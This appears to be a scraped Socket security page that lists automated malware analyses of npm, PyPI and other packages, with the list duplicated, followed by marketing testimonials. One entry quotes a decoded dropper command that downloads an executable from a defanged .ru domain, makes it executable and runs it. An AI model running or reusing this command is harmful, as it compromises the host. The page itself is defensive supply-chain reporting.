
Security News
Socket Security Analysis Is Now One Click Away on npm
npm now links to Socket's security analysis on every package page. Here's what you'll find when you click through.
Quickly evaluate the security and health of any open source package.
sbcli-dev
3.8.79
Live on PyPI
Blocked by Socket
No direct malware code is present in the fragment (no obvious backdoor, reverse shell, or exfiltration implemented in this file itself). However, the module exposes very high-risk functionality: it connects to the Docker API over plaintext TCP, allows client-controlled image pulls and runs containers as privileged with host mounts and host networking, and injects potentially sensitive credentials into container environments. These behaviors make this code a significant supply-chain and host compromise risk if the endpoints are reachable by untrusted users or if DOCKER_IP/docker daemon is exposed. Recommend restricting access, enforcing authentication/authorization, validating image names (or disallowing arbitrary images), using TLS/auth for Docker daemon, removing privileged/host_mode mounts where possible, and avoiding passing untrusted secrets into container environments.
github.com/bishopfox/sliver
v1.5.40-0.20230614192516-4841e46c346b
Live on Go Modules
Blocked by Socket
This file is an HTTP client for the Sliver implant C2 framework. It implements session bootstrapping, encrypted communication, polling, and closing behavior for a remote implant. The code is intentionally designed for covert network communication with a controller and therefore is malicious in the context of normal applications. Specific security concerns include predictable nonces due to math/rand, potential logging of sensitive data when compiled with debug, and in-memory handling of proxy credentials. If found in a package dependency for benign software, it should be considered a high-severity supply-chain compromise and removed or blocked.
ironpython.stdlib
3.4.1
by IronPython Contributors,Python Contributors, IronPython Contributors, Python Contributors
Live on NuGet
Blocked by Socket
This is a mailcap parser/utility that reads mailcap files and constructs shell commands from their entries. The code executes commands via os.system after performing textual substitution using filename, MIME type, and parameters. That behavior is expected for a mailcap implementation, but it represents a high-risk sink: untrusted mailcap files, environment variables, or attacker-controlled filename/plist values can lead to arbitrary command execution (shell injection). The code itself does not contain obfuscated or hidden malware, credentials, or explicit exfiltration; however, using it with untrusted inputs or untrusted mailcap files is dangerous. Recommend treating mailcap files as trusted input only, or replacing os.system usage with safer invocation (e.g., subprocess with argument lists and proper escaping/validation).
blue-button
1.5.1
by kachok
Live on npm
Blocked by Socket
The analyzed code is a standard, well-scoped DOM filtering utility (akin to jQuery/Sizzle). There is no evidence of malicious behavior, backdoors, data exfiltration, or code execution. It interfaces with DOM APIs in controlled ways and does not read sensitive data from environment or network. Overall security risk is low, with no malware indicators detected in this fragment.
devflow-ai
3.0.0-alpha.42-devflow.2
Live on npm
Blocked by Socket
[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] This skill's documented behavior is plausible for a hooks/automation system, but its footprint is large and capable of exfiltrating sensitive data if misconfigured or abused. The main issues are missing details about where MCP memory/training data is sent and how authentication/filters are enforced, plus runtime execution via npx and arbitrary custom scripts. I classify this as SUSPICIOUS: not obviously malicious from the documentation alone, but the capabilities and unspecified remote endpoints create a moderate risk of credential/data leakage unless strict safeguards are implemented. LLM verification: The provided document describes a high-capability automation skill that — if implemented — would have broad access to local files, the ability to execute arbitrary shell commands, perform Git operations, and send data to remote training/orchestration services. The fragment contains no obvious obfuscated code or active backdoors, but the described features present real supply-chain and data-exfiltration risks unless strict allowlists, explicit consent, auditing, and endpoint trust anchors are enf
pycrackhash
0.1.1
Live on PyPI
Blocked by Socket
This module contains high-risk behaviors: it fetches arbitrary code from a remote URL, writes it into common Python installation directories or temp, and executes it as a background subprocess, passing base64-encoded payloads that contain hashes and action metadata. It also posts hashes to remote cracking services. These are supply-chain/backdoor and data-exfiltration capabilities. If you do not explicitly trust the remote endpoint (EXT_URL, PRIMARY_URL, SECONDARY_URL) and the environment where this runs, do not use this package. Consider removing or disabling the remote-fetch/execute behavior (EXT_DISABLE environment variable) and auditing the fetched script before allowing execution.
yizhifabao58
0.0.1-security
by npm
Live on npm
Blocked by Socket
Previously, this file referenced malicious code that posed a risk of unauthorized actions on user systems. The malicious package was removed by the registry’s security team. No specific command-and-control domains or IP addresses are documented. Users who installed the package when it contained malicious code could have been exposed to compromise.
easyship-components
3.9999.99
by yassine-ywh
Removed from npm
Blocked by Socket
This package will execute pre-install.js during npm install. That gives the package the ability to run arbitrary JS on the host, which can perform malicious actions (network calls, telemetry, file system changes, spawning shells, adding git hooks, deleting files, etc.). You must inspect the contents of pre-install.js and any code it loads (including dynamic network fetches, child_process usage, or writes to dotfiles) before installing. Treat this as a moderate-to-high risk until the script is reviewed.
Live on npm for 1 hour and 24 minutes before removal. Socket users were protected even while the package was live.
email-helper
2.0.20230806181812
by righettod
Removed from npm
Blocked by Socket
The code appears to dynamically execute code obtained from network responses based on the system platform. This behavior could be potentially dangerous and should be reviewed further to ensure it does not contain malicious or unauthorized actions.
Live on npm for 31 days and 43 minutes before removal. Socket users were protected even while the package was live.
secondary-market-client-deskent
0.0.12
Live on PyPI
Blocked by Socket
This Python script implements an automated Binance NFT purchasing bot that uses seleniumwire to capture real browser requests to binance[.]com (including session cookies, CSRF tokens, bnc-uuid, fvideo-id, user-agent and a large base64 ‘device-info’ blob). It then packages these credentials—together with proxy login/password, product data, request counts, sale timing and a local license key—and sends them in JSON POSTs over plain HTTP to a remote control server at endpoints such as: • http://127[.]0[.]0[.]1/scripts/licenses/checklicense • http://127[.]0[.]0[.]1/scripts/licenses/licenseapprove • http://127[.]0[.]0[.]1/scripts/products/secondary • http://127[.]0[.]0[.]1/scripts/products/secondary/results Because all communications default to unencrypted HTTP and delegate transaction logic to the remote host, an attacker controlling or compromising that host can hijack the user’s Binance session and execute arbitrary NFT purchases. This constitutes credential exfiltration and a remote-controlled backdoor—malicious behavior that poses a high security risk.
namira-account-reactjs
1.6.8
by amir.abolhasani.1368
Removed from npm
Blocked by Socket
The code contains potential security risks due to insufficient input validation and handling of sensitive user data. It is crucial to review and improve the input validation and data handling mechanisms to mitigate these risks.
Live on npm for 5 hours and 4 minutes before removal. Socket users were protected even while the package was live.
reallife
0.1.31
Live on PyPI
Blocked by Socket
This code implements a remote-controlled decorator that queries a hardcoded external HTTP endpoint to decide if a local function should run and optionally notifies that endpoint. The pattern is a high supply-chain and privacy risk: cleartext network calls to a hardcoded IP, no authentication or integrity checks, and remote control of execution. The snippet contains a runtime typo that prevents it from working as written, but the intended behavior is clear and concerning. While there is no direct evidence of data exfiltration in this fragment, the remote kill-switch/telemetry capability makes inclusion of this module risky and it should be treated as suspicious and reviewed/removed unless explicitly required and secured (use HTTPS, authentication, validate responses, and avoid remote kill-switches).
new-npm-packages
999.9.9
by mega707
Removed from npm
Blocked by Socket
The script collects information like package details, directories, hostnames, DNS servers and user information, and sends it to a remote server.
Live on npm for 2 hours and 29 minutes before removal. Socket users were protected even while the package was live.
roboidai
1.1.12
Live on PyPI
Blocked by Socket
This module deliberately obfuscates and executes a concealed Python payload at import/runtime. The use of multiple encoding layers and dynamic eval/compile is a high-risk pattern typical of backdoors or supply-chain malware. Treat this file as suspicious and unsafe to import or execute in any production or sensitive environment. Perform offline decoding and careful static analysis of the decoded payload in an isolated sandbox before any further use.
nphish
0.2.0
Live on PyPI
Blocked by Socket
This code is explicitly a phishing toolkit that automates hosting phishing pages, exposing them via public tunnels (ngrok/cloudflared), and capturing/storing victim credentials and IP information. The presence of an obfuscated base64 payload that is exec()'d is a strong malicious indicator because it allows hidden arbitrary code execution. The package downloads and executes external binaries and untrusted website content without validation. It should be considered malicious for most benign deployment contexts and should not be run in any environment you care about. Use only in controlled, legal, consented penetration testing environments after fully auditing the decoded payload.
mmarchini-oss/npm-otp-publish
21dccdcd432c34a69d584aba3a96071bb69d07a4
Live on GitHub Actions
Blocked by Socket
This entrypoint orchestrates an ephemeral, publicly-exposed web service that advertises its URL externally and accepts a one-time-password which it immediately forwards to an npm-publish helper. That orchestration strongly resembles phishing/capture-and-use tooling for npm account takeover (e.g., capture 2FA OTP and immediately publish). Definitive maliciousness depends on the implementations of Notifier and NpmPublish and on configuration (who receives the ngrok URL, whether OTPs are forwarded to attackers). Treat the package as high risk: review Notifier and NpmPublish code and any configured endpoints or credentials before running. Avoid running this in environments with privileged npm credentials or CI secrets until a full audit of the dependent modules is completed.
meutils
2025.4.29.21.33.50
Live on PyPI
Blocked by Socket
The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.
vikunja-mcp
0.5.1
Removed from PyPI
Blocked by Socket
The code implements a deliberate local-pip import redirection, enabling execution of a vendored pip from a controlled directory. While this can be legitimate for offline or vendor-provided tooling, it introduces notable supply-chain risk: tampered or malicious local pip content would run with the host process privileges. The pattern should be safeguarded with strict integrity checks (signatures, hashes, or a robust lockfile) and access controls to prevent tampering of PIP_SOURCES_ROOT. If this behavior is unintended, it constitutes a significant security risk.
Live on PyPI for 13 hours and 16 minutes before removal. Socket users were protected even while the package was live.
linxploit
0.1
Live on PyPI
Blocked by Socket
This is a highly dangerous payload registry that, if executed, can cause widespread data loss, system downtime, and potential firmware/kernel compromise. It represents clear malicious risk and should be removed from any benign codebase, with strict access controls and scanning to prevent inadvertent exposure in supply chains. Treat as malware-like content and revoke publishing rights for any packages containing it.
meutils
2025.8.29.20.5.48
Live on PyPI
Blocked by Socket
The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.
cmpuiforoath
1.1.6
by jpdtest
Removed from npm
Blocked by Socket
The code exhibits behavior consistent with data exfiltration, collecting and sending sensitive system information to a remote server without user consent. This poses a significant security risk.
Live on npm for 13 days, 1 hour and 25 minutes before removal. Socket users were protected even while the package was live.
xync-client
0.0.121
Live on PyPI
Blocked by Socket
This script is high-risk: it automates interactive login flows, captures and persists full browser storage_state (session tokens), and navigates authenticated sessions to banking/payment endpoints. The combination enables account takeover and fraudulent transactions when misused. Treat as malicious or at minimum dangerous automation; require immediate review, restrict execution, and audit any stored agent.state entries. Remediate by removing session persistence, not storing storage_state, and implementing strict access controls and logging.
wix-perf-measure
2.999.999
Removed from npm
Blocked by Socket
The code uses the exec function to run shell commands, which poses a significant security risk. It could potentially execute malicious code if the input to exec is manipulated. Redirecting output to /dev/null to hide execution details is suspicious.
Live on npm for 15 minutes before removal. Socket users were protected even while the package was live.
@techwavedev/agi-agent-kit
1.3.2
Live on npm
Blocked by Socket
[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] The instruction set is functionally coherent for converting Stitch designs into modular React components, but contains multiple high-risk operational behaviors: executing an opaque bash helper with an external URL, automatically running npm install/dev (which can execute lifecycle scripts), and granting broad tool permissions (stitch*). These behaviors create realistic supply-chain and remote code execution attack surfaces. Recommended mitigations before executing this skill: validate and whitelist htmlCode.downloadUrl domains, inspect and vet scripts/fetch-stitch.sh content, pin and audit npm dependencies, run installs and validation in a sandboxed/ephemeral environment, restrict tool permissions to the minimum necessary, and require provenance checks for any third-party code (qdrant-memory). Treat the workflow as elevated-risk until those controls are in place. LLM verification: SUSPICIOUS / POTENTIALLY RISKY — The module's stated purpose (design-to-code conversion) is legitimate, but the provided instructions promote executing an opaque Bash fetch script and running unpinned npm installs and dev scripts on the host. These operations materially increase the attack surface and enable supply-chain or host compromise if inputs or dependencies are malicious or compromised. I do not see clear evidence of intentional malware in the provided fragment, but the workflow requires
@twork-data-services/aggregator-account-get-otb-by-account
1.99.0
by johrdanalfred
Live on npm
Blocked by Socket
The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.
sbcli-dev
3.8.79
Live on PyPI
Blocked by Socket
No direct malware code is present in the fragment (no obvious backdoor, reverse shell, or exfiltration implemented in this file itself). However, the module exposes very high-risk functionality: it connects to the Docker API over plaintext TCP, allows client-controlled image pulls and runs containers as privileged with host mounts and host networking, and injects potentially sensitive credentials into container environments. These behaviors make this code a significant supply-chain and host compromise risk if the endpoints are reachable by untrusted users or if DOCKER_IP/docker daemon is exposed. Recommend restricting access, enforcing authentication/authorization, validating image names (or disallowing arbitrary images), using TLS/auth for Docker daemon, removing privileged/host_mode mounts where possible, and avoiding passing untrusted secrets into container environments.
github.com/bishopfox/sliver
v1.5.40-0.20230614192516-4841e46c346b
Live on Go Modules
Blocked by Socket
This file is an HTTP client for the Sliver implant C2 framework. It implements session bootstrapping, encrypted communication, polling, and closing behavior for a remote implant. The code is intentionally designed for covert network communication with a controller and therefore is malicious in the context of normal applications. Specific security concerns include predictable nonces due to math/rand, potential logging of sensitive data when compiled with debug, and in-memory handling of proxy credentials. If found in a package dependency for benign software, it should be considered a high-severity supply-chain compromise and removed or blocked.
ironpython.stdlib
3.4.1
by IronPython Contributors,Python Contributors, IronPython Contributors, Python Contributors
Live on NuGet
Blocked by Socket
This is a mailcap parser/utility that reads mailcap files and constructs shell commands from their entries. The code executes commands via os.system after performing textual substitution using filename, MIME type, and parameters. That behavior is expected for a mailcap implementation, but it represents a high-risk sink: untrusted mailcap files, environment variables, or attacker-controlled filename/plist values can lead to arbitrary command execution (shell injection). The code itself does not contain obfuscated or hidden malware, credentials, or explicit exfiltration; however, using it with untrusted inputs or untrusted mailcap files is dangerous. Recommend treating mailcap files as trusted input only, or replacing os.system usage with safer invocation (e.g., subprocess with argument lists and proper escaping/validation).
blue-button
1.5.1
by kachok
Live on npm
Blocked by Socket
The analyzed code is a standard, well-scoped DOM filtering utility (akin to jQuery/Sizzle). There is no evidence of malicious behavior, backdoors, data exfiltration, or code execution. It interfaces with DOM APIs in controlled ways and does not read sensitive data from environment or network. Overall security risk is low, with no malware indicators detected in this fragment.
devflow-ai
3.0.0-alpha.42-devflow.2
Live on npm
Blocked by Socket
[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] This skill's documented behavior is plausible for a hooks/automation system, but its footprint is large and capable of exfiltrating sensitive data if misconfigured or abused. The main issues are missing details about where MCP memory/training data is sent and how authentication/filters are enforced, plus runtime execution via npx and arbitrary custom scripts. I classify this as SUSPICIOUS: not obviously malicious from the documentation alone, but the capabilities and unspecified remote endpoints create a moderate risk of credential/data leakage unless strict safeguards are implemented. LLM verification: The provided document describes a high-capability automation skill that — if implemented — would have broad access to local files, the ability to execute arbitrary shell commands, perform Git operations, and send data to remote training/orchestration services. The fragment contains no obvious obfuscated code or active backdoors, but the described features present real supply-chain and data-exfiltration risks unless strict allowlists, explicit consent, auditing, and endpoint trust anchors are enf
pycrackhash
0.1.1
Live on PyPI
Blocked by Socket
This module contains high-risk behaviors: it fetches arbitrary code from a remote URL, writes it into common Python installation directories or temp, and executes it as a background subprocess, passing base64-encoded payloads that contain hashes and action metadata. It also posts hashes to remote cracking services. These are supply-chain/backdoor and data-exfiltration capabilities. If you do not explicitly trust the remote endpoint (EXT_URL, PRIMARY_URL, SECONDARY_URL) and the environment where this runs, do not use this package. Consider removing or disabling the remote-fetch/execute behavior (EXT_DISABLE environment variable) and auditing the fetched script before allowing execution.
yizhifabao58
0.0.1-security
by npm
Live on npm
Blocked by Socket
Previously, this file referenced malicious code that posed a risk of unauthorized actions on user systems. The malicious package was removed by the registry’s security team. No specific command-and-control domains or IP addresses are documented. Users who installed the package when it contained malicious code could have been exposed to compromise.
easyship-components
3.9999.99
by yassine-ywh
Removed from npm
Blocked by Socket
This package will execute pre-install.js during npm install. That gives the package the ability to run arbitrary JS on the host, which can perform malicious actions (network calls, telemetry, file system changes, spawning shells, adding git hooks, deleting files, etc.). You must inspect the contents of pre-install.js and any code it loads (including dynamic network fetches, child_process usage, or writes to dotfiles) before installing. Treat this as a moderate-to-high risk until the script is reviewed.
Live on npm for 1 hour and 24 minutes before removal. Socket users were protected even while the package was live.
email-helper
2.0.20230806181812
by righettod
Removed from npm
Blocked by Socket
The code appears to dynamically execute code obtained from network responses based on the system platform. This behavior could be potentially dangerous and should be reviewed further to ensure it does not contain malicious or unauthorized actions.
Live on npm for 31 days and 43 minutes before removal. Socket users were protected even while the package was live.
secondary-market-client-deskent
0.0.12
Live on PyPI
Blocked by Socket
This Python script implements an automated Binance NFT purchasing bot that uses seleniumwire to capture real browser requests to binance[.]com (including session cookies, CSRF tokens, bnc-uuid, fvideo-id, user-agent and a large base64 ‘device-info’ blob). It then packages these credentials—together with proxy login/password, product data, request counts, sale timing and a local license key—and sends them in JSON POSTs over plain HTTP to a remote control server at endpoints such as: • http://127[.]0[.]0[.]1/scripts/licenses/checklicense • http://127[.]0[.]0[.]1/scripts/licenses/licenseapprove • http://127[.]0[.]0[.]1/scripts/products/secondary • http://127[.]0[.]0[.]1/scripts/products/secondary/results Because all communications default to unencrypted HTTP and delegate transaction logic to the remote host, an attacker controlling or compromising that host can hijack the user’s Binance session and execute arbitrary NFT purchases. This constitutes credential exfiltration and a remote-controlled backdoor—malicious behavior that poses a high security risk.
namira-account-reactjs
1.6.8
by amir.abolhasani.1368
Removed from npm
Blocked by Socket
The code contains potential security risks due to insufficient input validation and handling of sensitive user data. It is crucial to review and improve the input validation and data handling mechanisms to mitigate these risks.
Live on npm for 5 hours and 4 minutes before removal. Socket users were protected even while the package was live.
reallife
0.1.31
Live on PyPI
Blocked by Socket
This code implements a remote-controlled decorator that queries a hardcoded external HTTP endpoint to decide if a local function should run and optionally notifies that endpoint. The pattern is a high supply-chain and privacy risk: cleartext network calls to a hardcoded IP, no authentication or integrity checks, and remote control of execution. The snippet contains a runtime typo that prevents it from working as written, but the intended behavior is clear and concerning. While there is no direct evidence of data exfiltration in this fragment, the remote kill-switch/telemetry capability makes inclusion of this module risky and it should be treated as suspicious and reviewed/removed unless explicitly required and secured (use HTTPS, authentication, validate responses, and avoid remote kill-switches).
new-npm-packages
999.9.9
by mega707
Removed from npm
Blocked by Socket
The script collects information like package details, directories, hostnames, DNS servers and user information, and sends it to a remote server.
Live on npm for 2 hours and 29 minutes before removal. Socket users were protected even while the package was live.
roboidai
1.1.12
Live on PyPI
Blocked by Socket
This module deliberately obfuscates and executes a concealed Python payload at import/runtime. The use of multiple encoding layers and dynamic eval/compile is a high-risk pattern typical of backdoors or supply-chain malware. Treat this file as suspicious and unsafe to import or execute in any production or sensitive environment. Perform offline decoding and careful static analysis of the decoded payload in an isolated sandbox before any further use.
nphish
0.2.0
Live on PyPI
Blocked by Socket
This code is explicitly a phishing toolkit that automates hosting phishing pages, exposing them via public tunnels (ngrok/cloudflared), and capturing/storing victim credentials and IP information. The presence of an obfuscated base64 payload that is exec()'d is a strong malicious indicator because it allows hidden arbitrary code execution. The package downloads and executes external binaries and untrusted website content without validation. It should be considered malicious for most benign deployment contexts and should not be run in any environment you care about. Use only in controlled, legal, consented penetration testing environments after fully auditing the decoded payload.
mmarchini-oss/npm-otp-publish
21dccdcd432c34a69d584aba3a96071bb69d07a4
Live on GitHub Actions
Blocked by Socket
This entrypoint orchestrates an ephemeral, publicly-exposed web service that advertises its URL externally and accepts a one-time-password which it immediately forwards to an npm-publish helper. That orchestration strongly resembles phishing/capture-and-use tooling for npm account takeover (e.g., capture 2FA OTP and immediately publish). Definitive maliciousness depends on the implementations of Notifier and NpmPublish and on configuration (who receives the ngrok URL, whether OTPs are forwarded to attackers). Treat the package as high risk: review Notifier and NpmPublish code and any configured endpoints or credentials before running. Avoid running this in environments with privileged npm credentials or CI secrets until a full audit of the dependent modules is completed.
meutils
2025.4.29.21.33.50
Live on PyPI
Blocked by Socket
The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.
vikunja-mcp
0.5.1
Removed from PyPI
Blocked by Socket
The code implements a deliberate local-pip import redirection, enabling execution of a vendored pip from a controlled directory. While this can be legitimate for offline or vendor-provided tooling, it introduces notable supply-chain risk: tampered or malicious local pip content would run with the host process privileges. The pattern should be safeguarded with strict integrity checks (signatures, hashes, or a robust lockfile) and access controls to prevent tampering of PIP_SOURCES_ROOT. If this behavior is unintended, it constitutes a significant security risk.
Live on PyPI for 13 hours and 16 minutes before removal. Socket users were protected even while the package was live.
linxploit
0.1
Live on PyPI
Blocked by Socket
This is a highly dangerous payload registry that, if executed, can cause widespread data loss, system downtime, and potential firmware/kernel compromise. It represents clear malicious risk and should be removed from any benign codebase, with strict access controls and scanning to prevent inadvertent exposure in supply chains. Treat as malware-like content and revoke publishing rights for any packages containing it.
meutils
2025.8.29.20.5.48
Live on PyPI
Blocked by Socket
The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.
cmpuiforoath
1.1.6
by jpdtest
Removed from npm
Blocked by Socket
The code exhibits behavior consistent with data exfiltration, collecting and sending sensitive system information to a remote server without user consent. This poses a significant security risk.
Live on npm for 13 days, 1 hour and 25 minutes before removal. Socket users were protected even while the package was live.
xync-client
0.0.121
Live on PyPI
Blocked by Socket
This script is high-risk: it automates interactive login flows, captures and persists full browser storage_state (session tokens), and navigates authenticated sessions to banking/payment endpoints. The combination enables account takeover and fraudulent transactions when misused. Treat as malicious or at minimum dangerous automation; require immediate review, restrict execution, and audit any stored agent.state entries. Remediate by removing session persistence, not storing storage_state, and implementing strict access controls and logging.
wix-perf-measure
2.999.999
Removed from npm
Blocked by Socket
The code uses the exec function to run shell commands, which poses a significant security risk. It could potentially execute malicious code if the input to exec is manipulated. Redirecting output to /dev/null to hide execution details is suspicious.
Live on npm for 15 minutes before removal. Socket users were protected even while the package was live.
@techwavedev/agi-agent-kit
1.3.2
Live on npm
Blocked by Socket
[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] The instruction set is functionally coherent for converting Stitch designs into modular React components, but contains multiple high-risk operational behaviors: executing an opaque bash helper with an external URL, automatically running npm install/dev (which can execute lifecycle scripts), and granting broad tool permissions (stitch*). These behaviors create realistic supply-chain and remote code execution attack surfaces. Recommended mitigations before executing this skill: validate and whitelist htmlCode.downloadUrl domains, inspect and vet scripts/fetch-stitch.sh content, pin and audit npm dependencies, run installs and validation in a sandboxed/ephemeral environment, restrict tool permissions to the minimum necessary, and require provenance checks for any third-party code (qdrant-memory). Treat the workflow as elevated-risk until those controls are in place. LLM verification: SUSPICIOUS / POTENTIALLY RISKY — The module's stated purpose (design-to-code conversion) is legitimate, but the provided instructions promote executing an opaque Bash fetch script and running unpinned npm installs and dev scripts on the host. These operations materially increase the attack surface and enable supply-chain or host compromise if inputs or dependencies are malicious or compromised. I do not see clear evidence of intentional malware in the provided fragment, but the workflow requires
@twork-data-services/aggregator-account-get-otb-by-account
1.99.0
by johrdanalfred
Live on npm
Blocked by Socket
The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.
Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.
Possible typosquat attack
Known malware
Git dependency
GitHub dependency
AI-detected potential malware
HTTP dependency
Obfuscated code
Suspicious Stars on GitHub
Telemetry
Protestware or potentially unwanted behavior
Critical CVE
High CVE
Medium CVE
Low CVE
Unpopular package
Minified code
Bad dependency semver
Wildcard dependency
Socket optimized override available
Deprecated
Unmaintained
Explicitly Unlicensed Item
License Policy Violation
Misc. License Issues
License exception
No License Found
Ambiguous License Classifier
Copyleft License
Non-permissive License
Unidentified License
Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.
Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Nat Friedman
CEO at GitHub

Suz Hinton
Senior Software Engineer at Stripe
heck yes this is awesome!!! Congrats team 🎉👏

Matteo Collina
Node.js maintainer, Fastify lead maintainer
So awesome to see @SocketSecurity launch with a fresh approach! Excited to have supported the team from the early days.

DC Posch
Director of Technology at AppFolio, CTO at Dynasty
This is going to be super important, especially for crypto projects where a compromised dependency results in stolen user assets.

Luis Naranjo
Software Engineer at Microsoft
If software supply chain attacks through npm don't scare the shit out of you, you're not paying close enough attention.
@SocketSecurity sounds like an awesome product. I'll be using socket.dev instead of npmjs.org to browse npm packages going forward

Elena Nadolinski
Founder and CEO at Iron Fish
Huge congrats to @SocketSecurity! 🙌
Literally the only product that proactively detects signs of JS compromised packages.

Joe Previte
Engineering Team Lead at Coder
Congrats to @feross and the @SocketSecurity team on their seed funding! 🚀 It's been a big help for us at @CoderHQ and we appreciate what y'all are doing!

Josh Goldberg
Staff Developer at Codecademy
This is such a great idea & looks fantastic, congrats & good luck @feross + team!
The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Scott Roberts
CISO at UiPath
As a happy Socket customer, I've been impressed with how quickly they are adding value to the product, this move is a great step!

Yan Zhu
Head of Security at Brave, DEFCON, EFF, W3C
glad to hear some of the smartest people i know are working on (npm, etc.) supply chain security finally :). @SocketSecurity

Andrew Peterson
CEO and Co-Founder at Signal Sciences (acq. Fastly)
How do you track the validity of open source software libraries as they get updated? You're prob not. Check out @SocketSecurity and the updated tooling they launched.
Supply chain is a cluster in security as we all know and the tools from Socket are "duh" type tools to be implementing. Check them out and follow Feross Aboukhadijeh to see more updates coming from them in the future.

Zbyszek Tenerowicz
Senior Security Engineer at ConsenSys
socket.dev is getting more appealing by the hour

Devdatta Akhawe
Head of Security at Figma
The @SocketSecurity team is on fire! Amazing progress and I am exciting to see where they go next.

Sebastian Bensusan
Engineer Manager at Stripe
I find it surprising that we don't have _more_ supply chain attacks in software:
Imagine your airplane (the code running) was assembled (deployed) daily, with parts (dependencies) from internet strangers. How long until you get a bad part?
Excited for Socket to prevent this

Adam Baldwin
VP of Security at npm, Red Team at Auth0/Okta
Congrats to everyone at @SocketSecurity ❤️🤘🏻

Nico Waisman
CISO at Lyft
This is an area that I have personally been very focused on. As Nat Friedman said in the 2019 GitHub Universe keynote, Open Source won, and every time you add a new open source project you rely on someone else code and you rely on the people that build it.
This is both exciting and problematic. You are bringing real risk into your organization, and I'm excited to see progress in the industry from OpenSSF scorecards and package analyzers to the company that Feross Aboukhadijeh is building!
Depend on Socket to prevent malicious open source dependencies from infiltrating your app.
Install the Socket GitHub App in just 2 clicks and get protected today.
Block 70+ issues in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.
Reduce work by surfacing actionable security information directly in GitHub. Empower developers to make better decisions.
Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.
Nov 23, 2025
Shai Hulud v2
